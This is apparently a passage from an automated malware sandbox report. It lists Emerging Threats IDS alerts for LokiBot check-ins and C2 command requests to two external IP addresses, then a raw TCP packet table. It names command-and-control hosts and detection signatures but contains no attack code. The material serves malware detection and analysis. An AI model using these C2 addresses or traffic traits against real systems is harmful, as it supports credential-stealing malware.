                  01/14/22-14:25:33.128240TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.4172.67.198.111
                  01/14/22-14:25:33.128240TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.4172.67.198.111
                  01/14/22-14:25:33.128240TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.4172.67.198.111
                  01/14/22-14:25:34.630207TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.4104.21.60.171
                  01/14/22-14:25:34.630207TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.4104.21.60.171
                  01/14/22-14:25:34.630207TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.4104.21.60.171
                  01/14/22-14:25:34.630207TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.4104.21.60.171
                  01/14/22-14:25:35.944353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.4104.21.60.171
                  01/14/22-14:25:35.944353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.4104.21.60.171
                  01/14/22-14:25:35.944353TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.4104.21.60.171
                  01/14/22-14:25:35.944353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.4104.21.60.171
                  01/14/22-14:25:37.320518TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.4104.21.60.171
                  01/14/22-14:25:37.320518TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.4104.21.60.171
                  01/14/22-14:25:37.320518TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.4104.21.60.171
                  01/14/22-14:25:37.320518TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.4104.21.60.171
                  01/14/22-14:25:38.912356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.4172.67.198.111
                  01/14/22-14:25:38.912356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.4172.67.198.111
                  01/14/22-14:25:38.912356TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.4172.67.198.111
                  01/14/22-14:25:38.912356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.4172.67.198.111
                  01/14/22-14:25:41.572780TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.4172.67.198.111
                  01/14/22-14:25:41.572780TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.4172.67.198.111
                  01/14/22-14:25:41.572780TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.4172.67.198.111
                  01/14/22-14:25:41.572780TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.4172.67.198.111
                  01/14/22-14:25:43.959684TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.4104.21.60.171
                  01/14/22-14:25:43.959684TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.4104.21.60.171
                  01/14/22-14:25:43.959684TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.4104.21.60.171
                  01/14/22-14:25:43.959684TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.4104.21.60.171
                  01/14/22-14:25:46.505955TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.4172.67.198.111
                  01/14/22-14:25:46.505955TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.4172.67.198.111
                  01/14/22-14:25:46.505955TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.4172.67.198.111
                  01/14/22-14:25:46.505955TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.4172.67.198.111
                  01/14/22-14:25:48.319340TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.4172.67.198.111
                  01/14/22-14:25:48.319340TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.4172.67.198.111
                  01/14/22-14:25:48.319340TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.4172.67.198.111
                  01/14/22-14:25:48.319340TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.4172.67.198.111
                  01/14/22-14:25:50.057956TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.4172.67.198.111
                  01/14/22-14:25:50.057956TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.4172.67.198.111
                  01/14/22-14:25:50.057956TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.4172.67.198.111
                  01/14/22-14:25:50.057956TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.4172.67.198.111
                  01/14/22-14:25:51.752908TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.4172.67.198.111
                  01/14/22-14:25:51.752908TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.4172.67.198.111
                  01/14/22-14:25:51.752908TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.4172.67.198.111
                  01/14/22-14:25:51.752908TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.4172.67.198.111
                  01/14/22-14:25:53.149995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.4104.21.60.171
                  01/14/22-14:25:53.149995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.4104.21.60.171
                  01/14/22-14:25:53.149995TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.4104.21.60.171
                  01/14/22-14:25:53.149995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.4104.21.60.171
                  01/14/22-14:25:54.980188TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.4104.21.60.171
                  01/14/22-14:25:54.980188TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.4104.21.60.171
                  01/14/22-14:25:54.980188TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.4104.21.60.171
                  01/14/22-14:25:54.980188TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.4104.21.60.171
                  01/14/22-14:25:57.480514TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.4172.67.198.111
                  01/14/22-14:25:57.480514TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.4172.67.198.111
                  01/14/22-14:25:57.480514TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.4172.67.198.111
                  01/14/22-14:25:57.480514TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.4172.67.198.111
                  01/14/22-14:25:59.305785TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.4172.67.198.111
                  01/14/22-14:25:59.305785TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.4172.67.198.111
                  01/14/22-14:25:59.305785TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.4172.67.198.111
                  01/14/22-14:25:59.305785TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.4172.67.198.111
                  01/14/22-14:26:01.263490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.4172.67.198.111
                  01/14/22-14:26:01.263490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.4172.67.198.111
                  01/14/22-14:26:01.263490TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.4172.67.198.111
                  01/14/22-14:26:01.263490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.4172.67.198.111
                  01/14/22-14:26:02.695748TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.4104.21.60.171
                  01/14/22-14:26:02.695748TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.4104.21.60.171
                  01/14/22-14:26:02.695748TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.4104.21.60.171
                  01/14/22-14:26:02.695748TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.4104.21.60.171
                  01/14/22-14:26:04.152079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.4104.21.60.171
                  01/14/22-14:26:04.152079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.4104.21.60.171
                  01/14/22-14:26:04.152079TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.4104.21.60.171
                  01/14/22-14:26:04.152079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.4104.21.60.171
                  01/14/22-14:26:06.129704TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.4104.21.60.171
                  01/14/22-14:26:06.129704TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.4104.21.60.171
                  01/14/22-14:26:06.129704TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.4104.21.60.171
                  01/14/22-14:26:06.129704TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.4104.21.60.171
                  01/14/22-14:26:07.683357TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.4104.21.60.171
                  01/14/22-14:26:07.683357TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.4104.21.60.171
                  01/14/22-14:26:07.683357TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.4104.21.60.171
                  01/14/22-14:26:07.683357TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.4104.21.60.171
                  01/14/22-14:26:10.439183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.4172.67.198.111
                  01/14/22-14:26:10.439183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.4172.67.198.111
                  01/14/22-14:26:10.439183TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.4172.67.198.111
                  01/14/22-14:26:10.439183TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.4172.67.198.111
                  01/14/22-14:26:12.298204TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.4104.21.60.171
                  01/14/22-14:26:12.298204TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.4104.21.60.171
                  01/14/22-14:26:12.298204TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.4104.21.60.171
                  01/14/22-14:26:12.298204TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.4104.21.60.171
                  01/14/22-14:26:17.304219TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.4172.67.198.111
                  01/14/22-14:26:17.304219TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.4172.67.198.111
                  01/14/22-14:26:17.304219TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.4172.67.198.111
                  01/14/22-14:26:17.304219TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983780192.168.2.4172.67.198.111
                  01/14/22-14:26:21.377816TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.4104.21.60.171
                  01/14/22-14:26:21.377816TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.4104.21.60.171
                  01/14/22-14:26:21.377816TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.4104.21.60.171
                  01/14/22-14:26:21.377816TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983980192.168.2.4104.21.60.171
                  01/14/22-14:26:25.951454TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.4172.67.198.111
                  01/14/22-14:26:25.951454TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.4172.67.198.111
                  01/14/22-14:26:25.951454TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.4172.67.198.111
                  01/14/22-14:26:25.951454TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.4172.67.198.111
                  01/14/22-14:26:31.541839TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.4104.21.60.171
                  01/14/22-14:26:31.541839TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.4104.21.60.171
                  01/14/22-14:26:31.541839TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.4104.21.60.171
                  01/14/22-14:26:31.541839TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.2.4104.21.60.171
                  01/14/22-14:26:35.369697TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.2.4172.67.198.111
                  01/14/22-14:26:35.369697TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.2.4172.67.198.111
                  01/14/22-14:26:35.369697TCP2025381ET TROJAN LokiBot Checkin4984780192.168.2.4172.67.198.111
                  01/14/22-14:26:35.369697TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984780192.168.2.4172.67.198.111
                  01/14/22-14:26:37.609826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.4104.21.60.171
                  01/14/22-14:26:37.609826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.4104.21.60.171
                  01/14/22-14:26:37.609826TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.4104.21.60.171
                  01/14/22-14:26:37.609826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.2.4104.21.60.171
                  01/14/22-14:26:38.999421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.4172.67.198.111
                  01/14/22-14:26:38.999421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.4172.67.198.111
                  01/14/22-14:26:38.999421TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.4172.67.198.111
                  01/14/22-14:26:38.999421TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.2.4172.67.198.111
                  01/14/22-14:26:40.507004TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.4172.67.198.111
                  01/14/22-14:26:40.507004TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.4172.67.198.111
                  01/14/22-14:26:40.507004TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.4172.67.198.111
                  01/14/22-14:26:40.507004TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.2.4172.67.198.111
                  01/14/22-14:26:42.324571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987480192.168.2.4172.67.198.111
                  01/14/22-14:26:42.324571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987480192.168.2.4172.67.198.111
                  01/14/22-14:26:42.324571TCP2025381ET TROJAN LokiBot Checkin4987480192.168.2.4172.67.198.111
                  01/14/22-14:26:42.324571TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987480192.168.2.4172.67.198.111
                  01/14/22-14:26:44.323356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.4104.21.60.171
                  01/14/22-14:26:44.323356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.4104.21.60.171
                  01/14/22-14:26:44.323356TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.4104.21.60.171
                  01/14/22-14:26:44.323356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.4104.21.60.171
                  01/14/22-14:26:45.981353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.2.4172.67.198.111
                  01/14/22-14:26:45.981353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.2.4172.67.198.111
                  01/14/22-14:26:45.981353TCP2025381ET TROJAN LokiBot Checkin4987680192.168.2.4172.67.198.111
                  01/14/22-14:26:45.981353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.2.4172.67.198.111
                  01/14/22-14:26:47.483133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.2.4104.21.60.171
                  01/14/22-14:26:47.483133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.2.4104.21.60.171
                  01/14/22-14:26:47.483133TCP2025381ET TROJAN LokiBot Checkin4987780192.168.2.4104.21.60.171
                  01/14/22-14:26:47.483133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.2.4104.21.60.171
                  01/14/22-14:26:48.973044TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987880192.168.2.4104.21.60.171
                  01/14/22-14:26:48.973044TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987880192.168.2.4104.21.60.171
                  01/14/22-14:26:48.973044TCP2025381ET TROJAN LokiBot Checkin4987880192.168.2.4104.21.60.171
                  01/14/22-14:26:48.973044TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987880192.168.2.4104.21.60.171
                  01/14/22-14:26:50.474064TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.2.4172.67.198.111
                  01/14/22-14:26:50.474064TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.2.4172.67.198.111
                  01/14/22-14:26:50.474064TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.4172.67.198.111
                  01/14/22-14:26:50.474064TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.2.4172.67.198.111
                  01/14/22-14:26:52.091601TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.2.4172.67.198.111
                  01/14/22-14:26:52.091601TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.2.4172.67.198.111
                  01/14/22-14:26:52.091601TCP2025381ET TROJAN LokiBot Checkin4988080192.168.2.4172.67.198.111
                  01/14/22-14:26:52.091601TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.2.4172.67.198.111
                  01/14/22-14:26:55.192747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.4104.21.60.171
                  01/14/22-14:26:55.192747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.4104.21.60.171
                  01/14/22-14:26:55.192747TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.4104.21.60.171
                  01/14/22-14:26:55.192747TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.4104.21.60.171
                  01/14/22-14:26:56.736108TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.4104.21.60.171
                  01/14/22-14:26:56.736108TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.4104.21.60.171
                  01/14/22-14:26:56.736108TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.4104.21.60.171
                  01/14/22-14:26:56.736108TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.4104.21.60.171
                  01/14/22-14:26:58.241653TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.4104.21.60.171
                  01/14/22-14:26:58.241653TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.4104.21.60.171
                  01/14/22-14:26:58.241653TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.4104.21.60.171
                  01/14/22-14:26:58.241653TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.4104.21.60.171
                  01/14/22-14:27:01.355495TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.4104.21.60.171
                  01/14/22-14:27:01.355495TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.4104.21.60.171
                  01/14/22-14:27:01.355495TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.4104.21.60.171
                  01/14/22-14:27:01.355495TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.4104.21.60.171
                  01/14/22-14:27:03.312330TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.2.4172.67.198.111
                  01/14/22-14:27:03.312330TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.2.4172.67.198.111
                  01/14/22-14:27:03.312330TCP2025381ET TROJAN LokiBot Checkin4988680192.168.2.4172.67.198.111
                  01/14/22-14:27:03.312330TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.2.4172.67.198.111
                  01/14/22-14:27:05.323353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.4172.67.198.111
                  01/14/22-14:27:05.323353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.4172.67.198.111
                  01/14/22-14:27:05.323353TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.4172.67.198.111
                  01/14/22-14:27:05.323353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.4172.67.198.111
                  01/14/22-14:27:08.256759TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.4172.67.198.111
                  01/14/22-14:27:08.256759TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.4172.67.198.111
                  01/14/22-14:27:08.256759TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.4172.67.198.111
                  01/14/22-14:27:08.256759TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.4172.67.198.111
                  01/14/22-14:27:09.950748TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.4104.21.60.171
                  01/14/22-14:27:09.950748TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.4104.21.60.171
                  01/14/22-14:27:09.950748TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.4104.21.60.171
                  01/14/22-14:27:09.950748TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.4104.21.60.171
                  01/14/22-14:27:11.589922TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.4172.67.198.111
                  01/14/22-14:27:11.589922TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.4172.67.198.111
                  01/14/22-14:27:11.589922TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.4172.67.198.111
                  01/14/22-14:27:11.589922TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.4172.67.198.111
                  01/14/22-14:27:13.021372TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.2.4104.21.60.171
                  01/14/22-14:27:13.021372TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.2.4104.21.60.171
                  01/14/22-14:27:13.021372TCP2025381ET TROJAN LokiBot Checkin4989180192.168.2.4104.21.60.171
                  01/14/22-14:27:13.021372TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.2.4104.21.60.171
                  01/14/22-14:27:14.416694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.4172.67.198.111
                  01/14/22-14:27:14.416694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.4172.67.198.111
                  01/14/22-14:27:14.416694TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.4172.67.198.111
                  01/14/22-14:27:14.416694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.4172.67.198.111
                  01/14/22-14:27:15.866209TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.2.4104.21.60.171
                  01/14/22-14:27:15.866209TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.2.4104.21.60.171
                  01/14/22-14:27:15.866209TCP2025381ET TROJAN LokiBot Checkin4989380192.168.2.4104.21.60.171
                  01/14/22-14:27:15.866209TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.2.4104.21.60.171
                  01/14/22-14:27:17.283952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.2.4104.21.60.171
                  01/14/22-14:27:17.283952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.2.4104.21.60.171
                  01/14/22-14:27:17.283952TCP2025381ET TROJAN LokiBot Checkin4989480192.168.2.4104.21.60.171
                  01/14/22-14:27:17.283952TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.2.4104.21.60.171
                  01/14/22-14:27:18.647021TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.2.4104.21.60.171
                  01/14/22-14:27:18.647021TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.2.4104.21.60.171
                  01/14/22-14:27:18.647021TCP2025381ET TROJAN LokiBot Checkin4989580192.168.2.4104.21.60.171
                  01/14/22-14:27:18.647021TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.2.4104.21.60.171

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 14, 2022 14:25:08.461890936 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:08.462043047 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:08.462141037 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:08.462203979 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:08.462255955 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:08.462275982 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:08.462393045 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:08.462426901 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:08.462483883 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:08.478625059 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.478894949 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.478910923 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.478990078 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479005098 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479068041 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479084969 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479099989 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479115009 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479173899 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479190111 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479219913 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479237080 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479252100 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479290009 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:08.479542017 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479557991 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479573965 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479589939 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479604006 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479620934 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479635954 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479746103 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479762077 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479779005 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479794979 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479819059 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479835987 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479938984 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479955912 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.479990959 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:08.480096102 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.480113029 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.480129004 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.480144024 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.480175972 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.480190992 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.480218887 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.480235100 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.481970072 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.482047081 CET49703443192.168.2.4204.79.197.200
